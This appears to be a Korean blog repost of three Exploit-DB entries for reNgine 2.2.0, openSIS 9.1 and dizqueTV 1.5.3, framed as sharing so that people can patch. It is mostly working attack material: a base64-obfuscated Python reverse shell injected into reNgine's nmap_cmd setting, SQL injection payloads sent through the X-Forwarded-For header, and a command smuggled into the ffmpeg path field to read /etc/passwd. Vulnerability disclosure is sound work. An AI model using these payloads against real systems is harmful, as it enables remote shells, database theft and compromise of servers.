Exploit-DB는 펜 테스터, 연구자,  해킹을 위한 공개적인 취약점 정보와 공격 코드를 제공하는 웹사이트입니다

지피지기 백전백승(知彼知己 百戰百勝)이라고 내 취약점을 파악하여 보안 패치를 위해서 공유합니다.

2024-10-01 reNgine 2.2.0 - Command Injection (Authenticated)    WebApps    Multiple    Caner Tercan

[code]

# Exploit Title: reNgine 2.2.0 - Command Injection (Authenticated)
# Date: 2024-09-29
# Exploit Author: Caner Tercan
# Vendor Homepage: https://rengine.wiki/
# Software Link: https://github.com/yogeshojha/rengine
# Version: v2.2.0
# Tested on: macOS

POC : 

1. Login the Rengine Platform
2. Click the Scan Engine
3. Modify any Scan Engine
4. I modified nmap_cmd parameters on yml config
5. Finally, add a target in the targets section, select the scan engine you edited and start scanning.

payload :

'nmap_cmd': 'echo "cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxvcyxwdHk7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMjQ0LjE1MC42OSIsNjE2MTIpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7b3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtwdHkuc3Bhd24oIi9iaW4vc2giKScg"|base64 --decode |/bin/sh  #’

[/code]

2024-10-01 openSIS 9.1 - SQLi (Authenticated)    WebApps    PHP    Devrim Dıragumandan

[code]

# Exploit Title: openSIS 9.1 - SQLi (Authenticated) # Google Dork: intext:"openSIS is a product" # Date: 09.09.2024 # Exploit Author: Devrim Dıragumandan (d0ub1edd) # Vendor Homepage: https://www.os4ed.com/ # Software Link: https://github.com/OS4ED/openSIS-Classic/releases/tag/V9.1 # Version: 9.1 # Tested on: Linux A SQL injection vulnerability exists in OS4Ed Open Source Information System Community v9.1 via the "X-Forwarded-For" header parameters in POST request sent to /Ajax.php. GET /Ajax.php?modname=x HTTP/1.1 --- Parameter: X-Forwarded-For #1* ((custom) HEADER) Type: boolean-based blind Title: MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: 127.0.0.2' AND EXTRACTVALUE(5785,CASE WHEN (5785=5785) THEN 5785 ELSE 0x3A END) AND 'HVwG'='HVwG Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: 127.0.0.2' AND GTID_SUBSET(CONCAT(0x717a787671,(SELECT (ELT(5261=5261,1))),0x71716b6b71),5261) AND 'djze'='djze Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: 127.0.0.2' AND (SELECT 5313 FROM (SELECT(SLEEP(5)))VeyP) AND 'ZIae'='ZIae --- FIX: https://github.com/OS4ED/openSIS-Classic/pull/322

[/code]

2024-10-01 dizqueTV 1.5.3 - Remote Code Execution (RCE)    WebApps    JSP    Ahmed Said Saud Al-Busaidi

[code]

# Exploit Title: dizqueTV 1.5.3 - Remote Code Execution (RCE) # Date: 9/21/2024 # Exploit Author: Ahmed Said Saud Al-Busaidi # Vendor Homepage: https://github.com/vexorian/dizquetv # Version: 1.5.3 # Tested on: linux POC: ## Vulnerability Description dizqueTV 1.5.3 is vulnerable to unauthorized remote code execution from attackers. ## STEPS TO REPRODUCE 1. go to http://localhost/#!/settings 2. now go to ffmpeg settings and change the FFMPEG Executable Path to: "; cat /etc/passwd && echo 'poc'" 3. click on update 4. now visit http://localhost/#!/version or click on version and you should see the content of /etc/passwd

[/code]